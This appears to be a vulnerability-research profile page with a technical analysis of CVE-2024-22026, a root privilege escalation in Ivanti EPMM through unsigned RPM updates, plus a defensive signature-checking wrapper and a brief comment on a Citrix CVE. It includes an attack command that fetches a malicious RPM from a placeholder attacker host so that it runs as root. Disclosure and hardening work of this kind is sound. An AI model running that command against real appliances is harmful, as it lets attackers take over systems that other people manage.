securekomodo (2)
Last Login: May 17, 2024
securekomodo's Latest (2) Contributions
Technical Analysis
CVE-2024-22026 is a local privilege escalation vulnerability in Ivanti EPMM (formerly MobileIron) server versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1. This vulnerability allows a local attacker to gain root access to the system by exploiting the software update process with a malicious RPM package from a remote URL.
The appliance uses the following command to fetch and install RPM packages as a low privilege user. This of course means you must have CLI access:
install rpm url <remote url>
The above command is only a CLI wrapper for the following, which runs as root:
/bin/rpm -Uvh *.rpm
This underlying rpm command does not enforce any signature verification or URL filtering, meaning any RPM package can be installed. This allows an attacker to forge and deliver a malicious RPM package that can compromise the appliance.
So you can root the appliance by hosting a malicious RPM with whatever commands you want, then fetch it using the standard update command on the Ivanti EPMM CLI, and your commands will run as root.
install rpm url http://<attacker_IP>/malicious.rpm
I have provided a POC here:
https://www.redlinecybersecurity.com/blog/exploiting-cve-2024-22026-rooting-ivanti-epmm-mobileiron-core
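To make the two missing controls concrete, here is a hardened update wrapper with the checks the appliance's wrapper lacks: an HTTPS-only host allowlist for the URL and a requirement that the fetched RPM carry a valid signature before `rpm -Uvh` runs. This is an added example, not code from the post or from Ivanti; the allowlisted host, the `rpm -Kv` sample output and the function names are constructed for illustration.

```python
import re
import subprocess
from urllib.parse import urlparse

# Constructed allowlist for the example; a real appliance would ship its vendor's update hosts.
ALLOWED_HOSTS = {"updates.example.invalid"}

# `rpm -Kv` prints one status line per check, e.g.
#   "Header V4 RSA/SHA256 Signature, key ID 8483c65d: OK"  (a PGP signature that verified)
#   "Header SHA256 digest: OK"                             (a digest only, proves nothing about origin)
SIG_OK = re.compile(r"Signature, key ID [0-9a-f]+: OK$", re.IGNORECASE)
STATUS = re.compile(r": (OK|NOKEY|NOTOK|NOT OK|BAD)$", re.IGNORECASE)


def url_is_allowed(url, allowed_hosts=ALLOWED_HOSTS):
    """Accept only https:// to an allowlisted host, no embedded credentials, .rpm path."""
    p = urlparse(url)
    if p.scheme != "https" or p.username or p.password:
        return False
    return (p.hostname or "").lower() in allowed_hosts and p.path.endswith(".rpm")


def signature_verified(checksig_output):
    """Parse `rpm -Kv` output: require at least one OK PGP signature line and no
    line with a status other than OK. The exit code of `rpm -K` alone is not
    enough, because an unsigned package with intact digests still exits 0."""
    saw_signature = False
    for line in checksig_output.splitlines():
        m = STATUS.search(line.strip())
        if m and m.group(1).upper() != "OK":
            return False  # NOKEY, NOTOK, BAD: reject outright
        if SIG_OK.search(line.strip()):
            saw_signature = True
    return saw_signature


def safe_install(url, rpm_path):
    """Hardened replacement for running a bare `rpm -Uvh` on a fetched file (assumed helper)."""
    if not url_is_allowed(url):
        raise ValueError(f"refusing non-allowlisted update URL: {url}")
    out = subprocess.run(["rpm", "-Kv", rpm_path], capture_output=True, text=True).stdout
    if not signature_verified(out):
        raise ValueError(f"refusing unsigned or badly signed package: {rpm_path}")
    subprocess.run(["rpm", "-Uvh", rpm_path], check=True)
```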
Interesting, so based on this, and combining research from other firms like https://blog.assetnote.io/2023/07/21/citrix-CVE-2023-3519-analysis/, even if you are running an older version, if SAML is not enabled, you theoretically would not be vulnerable.
UPDATE – BishopFox has demonstrated that SAML is not required to exploit!